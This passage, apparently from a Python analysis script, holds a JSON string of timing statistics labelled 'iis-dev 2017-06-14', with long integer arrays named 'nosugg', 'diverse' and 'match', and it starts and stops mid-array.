3,95,178,126,129,104,205,266,262,44,53,39,38,25,57,95,202,98,158,58,132,251,127,114,204,38,61,103,225,99,301,102,221,154,133,226,164,99,208,112,146,127,77,119,82,229,120,295,240,399,249,357,55,125,338,126,474,32,163]} ''' #%% # iis-dev 2017-06-14 stats = ''' {"numInflight":0,"nosugg":[223,72,172,49,54,365,500,39,49,37,224,65,70,48,71,53,212,92,144,63,59,46,211,39,59,53,54,263,63,64,57,59,154,190,34,33,75,158,111,74,71,105,68,68,69,73,171,104,100,48,115,113,72,50,52,45,47,52,52,49,45,92,99,98,115,208,92,40,35,87,81,45,62,166,78,42,52,90,50,76,61,93,97,132,58,75,175,45,55,151,42,57,32,58,115,146,143,67,64,47,53,80,76,99,150,104,100,136,41,74,191,117,103,133,52,74,224,52,60,49,86,57,62,60,87,117,150,150,184,66,71,52,48,126,83,80,123,56,77,46,87,77,74,64,61,5,67,66,5,29,47,74,142,6,5,115,35,270,270,177,53,64,60,63,124,62,58,234,164,78,45,76,52,57,21,59,216,73,109,76,113,43,50,46,80,119,55,80,206,44,42,6,5,63,89,80,108,10,48,57,68,137,131,146,170,77,126,122,155,69,65,181,221,225,266,72,60,59,53,60,93,115,118,81,97,86,42,52,166,334,64,66,56,78,77,108,141,60,61,57,88,182,12,44,7,14,44,12,45,22,5,64,109,5,46,73,74,78,74,72,75,6,41,68,64,210,51,51,115,127,41,68,214,77,72,56,48,322,66,71,59,55,49,48,49,53,81,58,54,145,48,121,123,71,69,143,54,85,92,66,62,40,214,50,92,312,198,52,68,64,56,62,225,97,47,50,61,60,62,58,42,45,79,49,85,64,67,162,158,74,81,56,75,174,67,71,51,47,54,60,87,78,55,51,62,77,42,66,91,158,214,206,41,62,88,46,58,81,76,61,61,63,60,214,62,59,40,46,68,81,44,155,63,52,66,43,88,67,63,47,66,114,56,69,184,181,79,76,46,71,68,93,49,50,63,81,52,50,87,88,69,69,56,58,159,54,49,49,71,67,47,63,60,89,83,60,74,121,126,67,85,67,81,78,74,65,81,51,107,80,52,125,150,129,72,291,330,59,83,73,480,545,338,67,63,49,51,88,73,193,47,51,184,41,359,219,6,5,75,70,25,42,65,6,5,231,128,96,91,45,51,45,59,5,39,40,59,61,58,62,59,59,132,117,32,36,64,168,37,79,46,56,56,58,42,44,48,38,41,59,53,81,208,153,93,89,64,60,43,43,113,132,92,11,38,185,37,34,39,66,37,41,36,35,62,64,84,89,122,62,64,44,91,68,66,119,49,49,8,47,55,66,48,88,149,142,47,95,57,63,61,62,47,54,39,79,51,64,89,100,57,55,54,66,58,56,64,36,43,46,53,40,46,51,47,36,61,42,101,82,51,54,36,54,80,74,70,48,93,86,39,36,62,60,13,53,158,5,48,43,71,67,63,259,57,53,89,90,61,106,67,43,80,57,59,70,75,52,62,59,65,370,366,70,68,152,72,68,55,53,50,62,69,53,70,46,44,104,40,94,63,64,114,109,53,66,65,63,107,102,50,46,58,55,182,99,8,79,75,266,264,61,99,90,64,53,55,49,71,142,207,68,63,60,62,48,83,71,191,80,67,67,177,93,42,80,95,92,185,40,52,44,75,41,90,86,144,53,43,75,61,57,78,76,95,10,41,172,177,175,52,50,64,59,60,62,66,62,104,138,134,43,53,66,71,46,57,59,77,46,55,74,81,44,221,60,60,57,145,136,70,76,63,55,58,67,63,76,73,262,82,79,61,106,132,47,54,44,89,84,65,101,74,119,190,63,96,64,72,75,77,74,75,57,55,117,112,97,173,68,65,81,77,183,61,74,80,54,57,78,52,55,53,70,74,54,54,74,115,49,46,66,85,72,72,61,81,80,76,50,46,43,75,55,52,91,118,126,166,46,70,44,40,264,169,61,60,52,63,320,315,46,61,55,63,41,38,62,109,58,104,172,53,69,94,140,152,89,171,44,42,177,223,437,75,71,44,40,49,94,47,45,53,89,76,107,62,107,99,148,145,123,49,57,49,47,41,57,56,59,74,114,41,81,146,185,62,62,76,79,363,627,623,52,82,54,94,90,101,66,101,118,71,61,162,312,51,84,50,85,245,240,53,51,76,72,73,233,229,129,57,56,72,116,71,66,65,42,80,314,180,111,93,89,261,84,83,41,83,116,58,55,80,125,32,68,62,59,120,56,101,97,63,83,92,94,63,63,60,56,180,52,54,64,63,53,89,79,49,77,117,90,96,72,69,51,51,61,59,62,67,85,82,47,50,86,82,200,185,88,93,52,94,78,81,81,56,51,81,80,84,129,124,95,70,53,92,91,87,55,52,199,67,64,44,86,55,56,50,59,130,164,56,53,47,87,146,121,116,88,129,82,127,68,112,57,52,60,106,52,49,37,121,133,68,108,74,72,122,269,149,183,73,117,56,56,18,52,75,71,269,67,104,58,55,75,106,69,113,65,60,172,71,75,104,48,86,62,74,70,47,92,52,54,128,120,58,87,65,61,85,128,52,49,140,50,86,148,141,62,58,57,54,51,61,6,6,6,42,123,61,106,150,153,55,59,42,41,42,40,50,58,59,55,59,85,43,83,42,32,48,73,238,261,47,59,71,56,62,55,61,57,73,80,70,87,94,68,65,56,60,54,57,85,151,147,52,75,5,5,11,151,78,93,53,65,41,49,43,69,47,72,53,107,56,54,148,151,64,93,54,54,48,69,77,117,50,47,63,64,143,44,62,52,85,50,71,56,55,42,76,52,89,69,66,57,57,43,39,265,46,43,43,99,51,78,120,61,60,54,52,56,59,55,69,103,87,47,50,53,67,50,101,62,81,111,54,54,52,51,45,58,153,184,174,49,51,43,53,55,56,53,68,56,65,48,46,40,48,102,170,57,65,58,59,47,70,56,6,48,242,185,130,183,180,56,47,48,56,54,39,47,104,58,54,141,63,70,49,54,51,55,57,153,150,55,64,76,57,54,77,74,52,84,81,40,39,56,55,38,57,56,75,73,41,51,94,44,82,53,41,39,80,71,81,104,56,54,63,71,71,68,70,66,40,62,54,64,62,64,69,43,62,51,56,65,62,50,58,50,47,74,106,57,62,64,61,87,52,84,51,76,74,138,224,141,161,158,63,62,59,63,45,51,48,79,77,33,43,48,51,268,265,76,73,59,56,51,66,48,62,51,50,90,110,72,68,57,49,62,63,241,262,120,156,63,397,183,62,60,50,79,22,48,52,147,69,74,15,207,166,162,112,110,17,57,64,68,65,75,72,47,43,64,213,91,88,57,60,57,96,53,51,292,288,297,135,175,54,99,58,55,50,58,48,82,190,239,69,65,95,75,120,109,106,56,53,240,314,70,92,81,62,60,140,82,45,94,70,101,236,231,22,66,61,53,66,54,55,52,52,39,37,51,71,72,246,242,55,58,40,44,41,197,214,54,127,145,78,80,80,120,166,206,123,269,270,60,66,135,99,110,44,55,58,53,87,99,45,57,65,86,104,47,91,172,174,56,185,186,80,93,168,82,89,109,65,79,109,63,83,179,401,53,61,52,76,86,108,87,85,149,45,71,44,84,156,157,57,185,189,242,48,49,143,191,218,71,79,106,48,50,50,24,56,17,7,47,11,124,89,317,90,128,126,128,121,122,200,244,221,265,95,110,215,354,157,69,78,165,193,120,99,144,130,131,183,99,134,81,142,89,162,282,61,191,120,155,167,70,77,136,113,164,86,100,165,211,70,190,197,258,205,76,87,160,89,99,118,106,107,232,55,99,110,145,124,121,140,194,67,76,80,109,359,78,115,111,124,134,177,192,139,190,148,196,131,237,105,43,76,85,88,89,140,165,89,102,263,44,181,184,187,54,151,161,163,70,73,71,106,111,37,59,63,85,48,132,138,176,77,92,56,106,151,79,82,106,64,75,77,65,69,72,113,124,189,176,56,66,155,149,220,110,141,74,78,104,116,67,76,76,70,71,85,63,64,167,61,61,83,81,80,88,335,52,254,256,257,261,144,145,147,84,74,173,216,220,203,204,95,111,221,53,91,95,120,21,14,198,214,27,63,75,51,71,73,47,75,92,218,220,219,37,51,67,98,98,67,72,71,251,306,44,115,147,23,113,45,64,71,83,167,180,94,63,63,57,59,68,85,149,154,69,69,71,194,8,57,74,77,163,175,75,92,156,63,89,163,80,148,149,116,118,127,129,119,120,79,114,116,118,46,61,66,80,97,117,52,89,79,157,114,138,142,110,112,126,121,127,127,88,154,215,121,171,248,76,79,187,191,93,124,48,68,91,200,202,205,113,130,10,33,130,166,177,99,107,125,61,90,128,68,68,69,77,54,61,72,77,46,62,60,62,50,76,72,84,138,14,110,136,23,87,270,79,68,110,60,183,66,72,78,52,67,136,73,127,173,180,159,137,235,178,242,103,144,68,90,78,77,137,147,44,53,60,55,67,99,147,153,55,58,84,118,183,68,69,86,136,253,276,196,64,80,41,121,139,169,177,191,100,135,104,108,95,55,177,185,78,96,111,120,60,59,69,84,177,178,75,47,175,49,199,257,86,60,48,75,106,113,86,120,69,81,113,114,152,54,147,149,147,165,48,75,129,75,132,59,148,151,160,188,97,109,51,126,160,134,250,72,52,135,198,53,66,52,59,120,266,68,64,88,94,97,52,67,59,79,73,233,236,105,300,302,103,104,51,86,137,158,120,125,68,121,107,173,55,198,223,110,104,106,151,175,155,160,70,86,46,58,117,226,229,224,60,107,72,169,57,75,149,157,148,182,260,216,73,168,114,155,88,110,123,81,81,108,49,364,122,178,70,72,72,125,53,137,77,79,38,98,191,8,54,114,239,7,79,153,17,160,283,44,27,142,237,22,141,151,68,82,47,163,8,9,52,137,332,48,60,145,166,165,143,107,114,47,89,86,71,92,130,90,101,79,81,48,40,65,106,65,68,105,113,116,119,93,69,74,88,57,125,137,86,84,114,44,107,129,65,65,84,59,134,47,64,71,77,134,159,161,53,65,62,63,132,142,152,174,41,183,41,100,50,88,94,84,89,94,97,83,76,91,140,60,62,99,74,74,83,68,48,61,122,51,58,62,92,58,59,68,70,71,49,104,125,132,287,42,67,125,133,139,122,42,55,52,98,132,65,58,78,81,115,121,122,177,114,120,122,96,104,106,62,48,74,141,63,150,95,130,69,71,117,198,200,114,124,45,97,44,172,172,56,119,122,103,68,75,94,128,142,57,60,54,36,124,12,50,40,61,85,134,137,91,89,128,123,141,145,94,108,220,45,58,90,146,52,100,126,73,134,77,46,236,72,119,296,53,107,44,14,47,77,36,142,11,12,18,71,87,89,90,66,61,35,57,126,65,76,53,63,161,256,58,63,67,94,52,51,177,73,77,83,92,106,188,170,178,120,130,156,184,86,132,76,141,190,65,67,60,129,62,131,70,77,65,74,93,121,125,135,144,68,69,88,89,100,146,92,109,132,147,88,91,76,90,93,62,59,51,83,82,75,84,96,187,70,81,43,69,65,87,68,114,125,54,66,74,90,127,157,158,83,87,115,133,160,227,102,146,113,130,69,74,77,146,22,68,133,48,162,177,176,92,122,131,97,54,58,125,125,63,65,74,79,71,97,334,67,70,167,83,49,162,177,46,299,299,56,77,114,51,49,61,153,153,117,119,154,112,14,131,40,78,91,354,86,61,120,39,68,40,134,59,116,92,113,136,159,67,80,121,58,91,175,99,152,120,126,134,75,81,113,270,59,198,243,54,327,216,278,357,81,90,82,119,129,150,99,86,93,65,267,61,59,91,64,68,82,78,104,106,102,104,58,99,82,95,114,52,46,68,74,61,138,107,102,210,51,110,56,69,83,109,114,106,115,69,130,62,89,95,70,72,113,44,97,100,113,165,49,63,109,138,56,87,142,76,92,89,94,96,74,87,44,55,70,76,87,135,156,57,89,101,108,40,60,157,91,96,102,57,60,45,69,78,230,54,91,76,52,275,10,46,84,101,143,103,101,165,86,9,56,18,216,42,76,134,71,99,115,79,81,96,246,72,129,133,55,67,54,58,92,129,155,165,114,120,77,176,205,39,104,47,72,88,83,55,89,93,62,65,105,164,73,54,66,74,91,92,246,89,92,40,140,80,85,118,121,84,85,52,75,79,74,136,106,141,145,90,245,150,128,56,65,107,114,129,153,61,94,101,127,155,69,60,63,76,92,50,54,58,53,113,153,67,73,39,77,43,57,179,48,79,40,84,43,62,63,215,293,65,72,53,77,252,218,94,74,119,168,246,55,108,55,97,140,178,229,48,67,87,158,231,132,40,70,199,42,47,155,167,181,63,102,15,14,156,85,7,11,9,139,71,73,65,136,53,64,55,126,128,7,159,79,64,62,74,82,99,74,196,74,117,152,230,63,197,199,293,78,62,67,118,110,101,105,34,56,96,106,54,214,70,49,242,70,111,194,65,99,34,92,94,154,139,125,127,132,137,127,79,95,64,114,316,109,95,138,69,58,369,197,142,150,144,57,184,172,135,136,98,127,76,39,137,47,104,61,92,137,272,355,272,273,93,95,84,122,42,183,126,71,51,148,216,219,76,99,75,93,63,66,76,90,85,53,69,127,70,136,41,44,121,164,385,53,85,78,187,47,123,133,48,118,13,112,113,46,165,168,45,138,69,82,43,118,141,236,59,31,124,60,120,213,139,54,157,54,247,85,61,84,93,80,73,66,59,62,67,257,129,11,11,94,10,107,137,144,77,87,97,178,181,65,176,46,69,147,52,63,96,82,137,153,97,79,80,62,66,140,43,108,93,377,120,113,60,212,56,381,46,72,47,135,63,67,49,79,61,99,105,93,93,88,56,76,101,172,40,136,156,104,71,114,283,253,47,68,65,94,97,76,146,66,129,160,237,59,75,62,81,245,177,79,72,47,95,46,73,61,82,250,70,65,124,74,83,51,54,184,132,300,96,120,128,87,99,129,55,62,90,255,47,72,54,88,112,77,49,25,75,40,117,48,63,70,31,40,57,196,46,18,80,137,102,73,28,69,59,45,181,20,94,161,170,122,76,60,82,83,70,59,96,80,72,13,46,64,87,113,88,101,147,255,130,53,62,128,47,191,160,112,131,77,191,109,292,227,110,73,69,56,63,96,48,38,36,58,119,123,61,95,48,125,48,56,138,51,64,43,43,80,137,121,67,69,251,58,86,44,60,72,134,71,325,54,72,132,72,42,74,133,45,44,50,71,79,100,67,55,71,74,113,118,55,79,82,54,222,64,123,256,47,42,141,43,45,59,67,77,116,222,125,71,154,66,7,40,43,76,86,66,181,39,326,44,112,216,125,47,57,39,51,43,62],"diverse":[379,374,308,330,279,181,234,240,231,196,241,259,257,342,576,581,201,278,285,248,244,184,256,247,204,231,179,169,148,231,20,124,243,214,275,12,11,75,151,64,152,11,235,239,293,63,148,221,274,197,247,195,241,205,278,173,227,288,173,168,94,220,353,450,160,192,242,237,201,229,197,223,258,216,219,226,253,66,122,133,12,72,133,129,155,367,399,213,250,323,318,231,164,248,144,287,277,257,205,330,415,412,329,297,223,286,19,87,22,19,197,193,184,386,421,199,254,236,253,81,175,231,215,121,158,376,367,196,315,243,201,209,261,51,120,40,36,177,107,186,161,202,236,317,222,269,175,171,216,296,94,89,313,379,315,336,257,254,167,20,25,66,167,295,306,138,187,11,162,324,142,184,171,337,210,261,308,326,259,278,246,281,187,182,111,170,202,269,203,258,12,175,227,269,276,272,201,303,248,249,184,208,241,318,458,187,237,212,269,227,262,525,513,261,257,216,248,227,268,207,256,229,251,258,254,263,258,199,235,438,386,12,11,340,332,155,328,353,197,239,275,204,302,218,214,10,176,201,146,91,307,127,164,109,105,105,159,106,93,88,430,199,268,163,329,213,301,412,277,211,278,215,274,295,189,242,157,179,214,259,296,237,161,182,437,433,328,374,364,273,180,190,188,77,118,218,287,231,255,279,105,178,228,248,276,281,281,182,227,311,307,198,277,293,348,236,253,232,332,156,250,288,49,150,146,133,177,197,184,206,250,300,349,256,252,276,371,375,378,411,184,212,465,461,266,261,264,223,65,94,114,164,201,346,202,197,245,235,235,252,248,209,205,265,123,123,119,224,246,221,267,176,266,292,210,206,320,316,213,260,210,256,228,232,276,164,69,124,194,178,116,429,225,245,198,253,104,163,215,211,269,237,282,93,34,89,24,20,130,175,45,18,170,232,85,16,66,71,95,26,184,203,180,225,307,414,468,313,197,241,225,208,253,203,251,288,367,268,261,257,199,238,251,221,253,133,166,361,402,398,180,227,213,260,195,279,290,253,216,262,194,246,208,198,207,251,386,339,218,263,261,268,104,176,274,194,235,357,353,264,335,109,172,166,329,385,169,101,220,200,249,27,23,21,164,286,11,17,132,210,252,282,229,252,248,272,293,222,269,100,156,268,340,212,247,285,280,314,322,125,210,205,242,181,317,317,302,298,98,284,209,252,254,249,281,362,224,264,412,375,157,176,234,232,431,148,236,181,195,31,178,132,128,156,152,124,481,321,317,12,179,191,176,247,189,186,209,251,211,256,30,82,214,316,245,227,63,84,68,86,90,161,248,245,260,318,367,248,244,271,326,16,13,10,13,19,273,270,230,226,222,218,132,222,283,223,245,287,230,307,206,245,206,238,244,240,85,155,56,55,16,50,89,163,63,239,256,298,200,231,245,283,209,77,207,211,228,102,114,116,188,206,231,483,252,249,258,272,59,55,16,48,439,123,128,67,252,248,160,324,215,279,271,287,200,277,410,121,170,16,14,248,128,183,213,247,10,157,270,254,186,231,234,250,214,279,167,212,127,123,189,233,186,231,259,235,252,246,201,246,28,231,233,289,223,329,326,228,225,256,320,103,171,217,262,147,211,251,222,273,419,290,280,58,363,145,143,147,230,227,271,321,253,253,233,169,178,249,246,261,258,324,206,236,224,269,249,389,340,286,150,147,95,91,108,203,233,292,164,160,406,441,437,47,129,55,206,274,270,153,198,237,240,40,185,86,232,233,278,221,250,294,214,257,338,334,250,303,263,347,119,212,256,251,421,427,270,316,361,358,164,177,221,235,330,203,286,343,341,98,149,206,244,88,98,224,269,133,328,129,172,262,103,280,279,127,222,236,281,71,53,233,328,76,114,524,519,111,203,274,318,308,263,259,148,234,280,121,241,245,270,50,47,47,152,134,130,164,233,107,157,434,431,446,442,305,314,286,282,229,273,166,133,195,192,202,44,226,76,71,284,329,127,200,277,255,279,275,179,207,236,201,238,280,191,230,151,182,178,200,197,205,237,236,243,47,179,14,23,194,19,129,284,250,247,184,201,209,207,192,189,211,103,154,316,312,242,240,211,262,258,254,240,341,107,86,106,262,83,79,213,253,63,59,81,338,244,239,268,265,205,241,188,208,254,300,296,209,274,222,265,212,255,17,186,182,209,256,152,203,247,175,283,355,286,155,311,309,229,275,201,392,213,264,191,234,206,232,302,299,234,266,138,206,215,256,224,267,200,249,256,202,246,209,251,166,162,15,52,164,198,233,276,166,187,98,279,276,215,237,238,263,272,326,15,81,339,335,335,141,186,212,257,218,250,208,109,146,192,226,206,253,325,322,351,147,179,157,183,179,501,546,266,262,102,181,164,113,171,245,282,167,208,268,263,100,111,163,254,295,273,226,266,240,249,275,197,193,301,297,174,289,286,155,53,87,83,247,292,227,266,233,226,270,366,455,312,275,320,615,708,252,334,142,225,253,250,222,269,336,333,364,235,232,228,256,298,293,35,30,118,112,186,248,27,157,185,221,11,11,170,184,170,272,409,411,151,226,261,209,159,333,398,400,123,202,236,86,197,207,243,245,106,184,166,211,357,357,256,379,284,251,100,106,353,357,227,38,293,201,215,223,270,273,280,299,223,280,282,196,243,205,423,441,453,354,371,299,344,296,298,196,110,191,236,255,276,285,206,359,362,362,228,299,243,130,255,311,405,406,185,250,251,133,187,185,161,274,276,190,225,346,347,363,247,372,373,253,315,321,349,305,264,265,237,241,128,268,270,16,265,313,186,79,176,172,158,183,213,267,205,230,242,244,209,217,265,197,158,134,291,140,78,335,337,363,48,160,114,176,258,264,202,263,298,266,266,422,200,313,364,222,302,347,39,165,98,185,200,30,174,83,51,191,216,274,183,191,168,28,197,221,159,211,134,157,138,128,194,207,225,34,165,156,342,344,391,281,206,192,146,313,313,177,115,66,243,246,247,169,99,234,235,331,331,363,163,222,266,316,338,339,238,137,199,38,203,250,161,167,205,247,191,269,273,163,209,261,209,252,68,366,367,139,217,219,220,221,422,419,438,440,265,279,213,239,290,166,221,206,215,252,77,52,227,228,273,107,166,168,162,209,170,229,181,65,91,168,199,211,72,118,180,234,237,243,246,232,256,272,206,226,279,142,162,211,308,309,311,177,285,285,247,248,174,334,357,356,74,191,196,157,81,212,260,276,277,193,197,63,187,267,268,233,165,188,133,188,208,140,192,180,221,269,272,258,274,347,363,363,170,173,119,227,284,206,202,189,248,167,251,295,242,286,244,257,262,264,313,252,268,183,226,270,264,266,188,189,211,266,389,401,404,404,209,153,155,152,174,340,343,196,165,188,240,245,207,250,212,219,269,183,193,236,166,201,171,150,215,160,217,170,341,244,256,296,162,172,178,184,331,347,348,79,166,226,250,226,256,176,247,297,235,236,168,236,238,263,147,128,185,226,100,162,185,272,281,267,269,144,178,194,195,282,282,393,395,118,251,303,131,104,413,439,440,144,224,269,116,192,235,203,166,63,242,298,10,20,147,148,114,151,199,129,276,277,29,159,201,252,216,243,232,206,236,174,338,364,367,96,219,250,307,190,266,269,70,189,250,178,211,212,234,115,167,247,249,250,180,178,83,306,322,199,245,343,345,156,157,180,213,237,268,178,168,250,253,276,178,202,142,170,199,199,183,240,211,255,352,373,373,141,244,281,206,250,166,236,254,125,196,256,130,185,83,174,237,255,251,175,224,151,165,311,345,346,348,181,188,170,330,332,352,211,163,304,117,106,177,194,213,229,275,181,106,187,174,181,190,225,246,247,210,173,20,169,255,207,252,171,170,223,264,253,300,141,141,113,24,202,29,393,471,475,127,249,251,174,83,348,371,373,197,199,247,312,354,233,256,218,157,218,225,173,195,217,209,263,182,317,169,169,214,187,203,252,70,173,180,222,168,206,172,267,178,180,331,333,190,174,131,206,261,194,238,208,248,299,339,143,103,142,170,204,243,176,131,222,250,248,224,271,199,240,169,162,220,254,276,146,202,180,257,258,240,184,126,185,180,193,173,188,180,127,130,143,138,190,144,184,173,95,17,99,184,248,221,67,181,163,133,136,168,200,253,185,218,260,261,211,262,225,256,258,167,201,164,123,193,23,169,173,334,336,169,169,200,30,171,296,353,153,17,19,18,197,341,358,158,122,166,351,355,356,258,200,246,242,245,299,72,129,172,200,292,349,350,170,166,223,231,219,100,193,214,200,246,223,335,336,72,226,226,124,128,126,187,195,44,198,133,171,198,209,59,250,291,181,200,266,142,267,269,296,192,203,265,113,180,134,138,188,38,241,59,319,321,18,13,233,359,359,340,344,356,356,356,160,152,180,166,211,254,167,195,199,183,147,193,265,267,182,184,100,206,21,180,223,284,260,80,195,251,172,217,161,137,272,310,24,139,42,178,44,234,181,194,242,292,356,356,388,188,170,206,252,254,266,268,174,131,270,277,137,140,176,133,199,246,252,254,289,361,164,162,168,378,382,405,208,260,222,286,164,207,256,173,252,264,180,327,351,162,204,147,198,196,233,281,161,205,166,104,168,183,243,247,251,252,189,155,283,300,303,119,182,209,181,194,109,242,245,259,311,262,263,291,190,156,216,185,165,321,324,360,138,114,131,164,352,352,355,178,179,233,298,184,172,176,222,241,250,253,291,95,126,114,173,174,217,173,411,432,433,435,292,340,149,173,229,245,127,192,248,258,464,469,512,161,192,249,245,248,208,199,190,216,219,247,250,192,189,338,341,263,264,307,15,332,348,350,59,195,52,54,170,218,272,266,313,169,97,276,331,14,172,86,181,124,182,349,376,379,188,206,270,243,169,178,167,192,255,357,361,234,281,252,255,128,268,338,341,219,255,205,217,305,326,328,169,211,51,285,330,264,266,301,166,281,339,340,248,301,270,275,203,251,158,195,221,242,110,237,294,296,111,173,153,209,252,227,284,144,172,107,176,98,278,281,162,242,295,296,202,241,318,344,208,270,188,193,266,266,304,188,195,198,251,290,311,315,171,102,419,460,155,324,343,346,289,298,350,209,248,162,472,474,474,194,247,379,407,409,155,165,163,335,339,339,204,254,199,32,362,370,410,157,219,255,348,197,139,192,343,355,435,437,458,460,217,192,165,203,228,280,177,218,251,222,258,272,298,215,277,225,275,159,212,258,273,53,138,60,256,384,212,258,233,283,274,275,358,276,309,249,225,176,151,200,90,235,359,361,363,115,174,177,252,164,220,252,302,416,419,98,200,149,189,239,273,314,213,18,175,212,189,191,127,163,208,265,238,257,233,154,235,274,183,277,131,137,196,128,73,253,258,240,241,111,170,147,200,178,214,254,99,260,186,249,304,358,387,388,191,173,204,190,271,373,374,391,337,217,541,556,553,177,251,189,48,146,267,70,164,162,222,97,251,153,63,92,224,94,197,165,79,366,390,393,116,184,205,242,179,168,133,270,113,186,285,309,323,334,336,184,178,159,161,151,252,256,284,167,104,100,160,92,122,90,52,411,413,445,225,271,161,163,168,170,132,177,230,234,212,246,158,65,259,271,160,266,268,344,348,367,368,207,332,334,258,260,276,446,446,217,265,302,348,208,64,163,321,324,241,242,177,225,115,145,112,323,339,137,210,250,254,417,426,428,149,270,204,246,256,133,159,513,535,538,547,181,236,173,331,334,346,366,195,166,93,17,26,189,148,270,177,345,364,157,37,223,168,181,252,259,170,176,206,240,28,215,226,202,224,24,121,154,196,192,182,229,29,111,213,28,184,218,222,49,313,315,179,19,123,294,412,432,435,283,306,298,200,229,255,160,113,184,214,203,171,135,171,61,199,150,171,249,177,233,251,166,175,166,347,181,184,157,206,161,345,349,373,243,245,183,211,170,223,218,165,252,333,339,135,106,196,95,246,181,176,399,445,450,268,271,211,157,568,591,593,248,252,334,347,350,322,323,164,206,153,299,334,173,523,590,592,592,197,256,167,283,285,312,243,215,262,246,248,168,163,211,232,319,338,346,217,258,202,245,224,268,206,203,213,294,184,148,147],"match":[244,292,212,192,246,304,305,245,262,250,194,206,224,293,226,258,209,317,254,207,215,183,225,286,280,263,41,151,10,9,233,289,194,227,188,230,178,160,157,332,290,344,375,562,579,575,44,46,225,225,134,143,191,228,237,140,197,219,298,312,230,241,208,232,163,214,341,332,377,183,258,193,184,216,192,226,180,217,284,280,310,190,237,189,355,455,373,177,102,151,223,288,271,174,173,214,198,237,167,163,159,189,301,200,239,241,177,214,235,239,241,226,196,230,215,210,215,313,280,172,202,238,190,202,117,163,91,103,197,258,203,209,245,233,263,202,268,209,224,242,197,234,268,228,224,161,154,152,169,231,227,197,237,173,138,172,289,285,225,220,69,70,167,179,174,204,161,163,307,14,155,187,233,203,211,164,181,219,104,198,195,243,240,397,99,167,202,233,221,217,183,227,74,69,159,113,196,209,191,237,210,218,165,176,172,174,210,267,274,323,227,79,79,176,206,195,112,161,83,186,168,118,113,211,237,238,323,353,196,235,72,137,200,240,197,218,247,282,210,275,319,195,234,252,431,449,458,413,217,243,343,65,81,312,217,183,226,235,288,261,323,373,360,358,181,244,195,238,232,353,233,183,261,254,399,368,142,138,200,289,278,227,276,177,10,165,113,166,163,220,238,235,260,268,189,145,212,344,269,291,229,289,263,280,276,115,111,119,115,58,79,74,202,234,140,60,237,247,156,153,190,239,23,79,157,408,200,233,207,224,229,419,102,152,224,295,276,119,292,321,306,292,194,244,221,293,275,207,203,172,245,241,191,226,208,226,140,215,257,195,191,224,159,293,374,379,218,206,217,37,168,221,277,199,228,249,288,206,315,199,239,292,207,12,10,331,326,198,299,333,258,283,209,169,171,56,93,215,195,244,202,275,252,247,230,153,233,284,283,225,217,55,141,161,184,221,181,177,225,249,187,209,208,271,245,138,193,187,223,232,292,295,148,211,207,401,157,185,198,254,229,121,273,254,229,196,245,310,162,101,97,293,305,327,196,233,204,233,213,237,193,224,88,84,207,233,140,160,239,235,115,200,230,29,79,79,87,329,370,405,415,244,59,80,194,221,251,247,267,203,233,200,212,225,260,176,227,223,194,271,166,187,225,128,124,287,315,301,80,265,261,190,229,73,85,261,257,186,257,127,79,121,208,179,103,161,191,294,189,227,156,167,77,75,69,187,222,211,272,69,90,103,167,11,127,434,473,231,256,155,145,308,196,259,226,184,226,153,230,227,120,215,233,145,141,83,79,13,92,259,470,427,485,194,235,189,228,184,223,224,223,210,79,109,200,229,328,296,341,187,227,212,225,257,192,250,179,155,293,263,202,231,191,230,270,428,197,245,59,62,238,234,178,217,231,270,208,240,178,185,222,119,174,192,215,271,268,212,200,234,210,283,270,118,170,315,310,307,142,205,201,189,250,283,225,296,217,262,208,280,182,199,236,234,276,328,242,234,199,244,235,233,166,163,67,230,104,84,161,202,200,180,125,271,196,259,226,341,213,249,202,230,397,393,217,213,101,151,293,302,273,216,228,223,315,154,261,257,144,204,275,188,220,242,169,242,188,226,242,321,245,194,217,375,303,349,198,249,177,173,199,194,225,212,246,94,110,195,241,156,91,162,392,387,389,256,212,393,277,274,90,461,457,443,262,298,243,273,391,346,342,271,159,176,232,258,290,352,209,181,219,158,225,223,323,262,209,205,187,222,175,221,148,455,227,223,211,222,315,235,391,298,110,106,53,210,250,208,241,137,188,180,215,159,193,237,218,256,9,54,164,160,194,227,210,239,90,86,77,201,241,269,241,269,78,80,166,162,191,224,300,392,295,202,201,250,248,125,199,250,131,362,407,173,253,207,268,313,208,214,260,156,222,267,297,424,281,291,379,379,374,13,157,96,196,242,266,263,147,292,291,390,350,237,250,248,214,258,236,276,230,246,330,327,327,252,249,89,208,252,186,182,85,81,47,93,155,271,267,356,383,182,66,109,285,281,257,307,33,84,209,254,91,25,216,318,211,246,391,387,143,219,77,157,245,241,197,160,216,260,89,85,272,279,327,371,343,209,286,282,163,185,173,217,203,312,356,230,239,206,240,203,226,174,301,297,201,276,214,231,244,50,46,198,194,124,205,199,244,128,174,209,257,212,256,191,407,108,153,215,225,260,123,374,275,208,118,253,118,183,138,135,259,360,395,279,260,303,242,31,66,245,333,253,378,419,120,216,251,242,238,319,284,329,238,263,170,250,336,243,257,254,205,242,235,231,248,296,248,224,268,256,297,292,223,201,241,240,330,162,296,292,339,225,417,414,378,84,89,381,376,204,127,175,224,265,296,372,249,271,267,265,309,194,231,232,43,165,237,298,296,141,181,203,9,102,176,124,224,221,365,360,45,162,159,226,272,26,268,314,331,232,152,227,226,121,199,244,251,293,284,16,168,286,283,239,28,69,192,239,224,219,117,168,208,252,220,275,160,166,269,315,313,214,215,250,217,263,198,239,200,244,211,370,191,233,203,231,270,267,334,332,377,152,230,248,106,227,264,473,470,496,457,196,237,332,189,229,231,240,239,267,251,285,276,322,318,170,213,126,221,266,235,233,307,254,188,331,213,186,230,274,113,170,264,259,136,164,216,252,203,247,157,205,286,165,169,222,266,273,199,239,211,261,196,193,164,320,361,198,229,300,348,307,222,244,182,257,138,268,112,200,238,320,349,235,305,199,353,338,202,247,18,54,77,73,318,364,11,192,139,136,56,96,199,195,224,155,200,129,287,336,260,256,294,339,201,231,236,254,180,203,219,110,106,217,301,299,114,59,55,226,322,152,175,217,254,144,157,182,234,229,96,141,31,85,225,270,235,258,144,373,370,181,176,202,237,235,279,104,221,256,182,106,161,105,108,223,264,269,357,443,312,197,229,205,322,50,74,149,223,282,234,426,321,217,249,196,243,75,89,189,359,196,222,179,499,457,524,137,133,212,126,199,234,64,60,237,263,364,194,244,231,263,234,230,115,251,221,262,206,220,310,225,258,254,177,222,243,320,248,249,280,246,292,305,173,187,179,186,225,262,258,205,201,228,262,194,239,227,300,254,229,250,276,307,384,387,233,229,216,224,270,218,223,207,252,265,307,189,270,161,163,91,88,344,312,313,135,131,214,401,251,194,194,233,218,445,489,378,173,176,77,141,207,246,218,249,267,263,255,346,207,202,227,254,280,238,235,327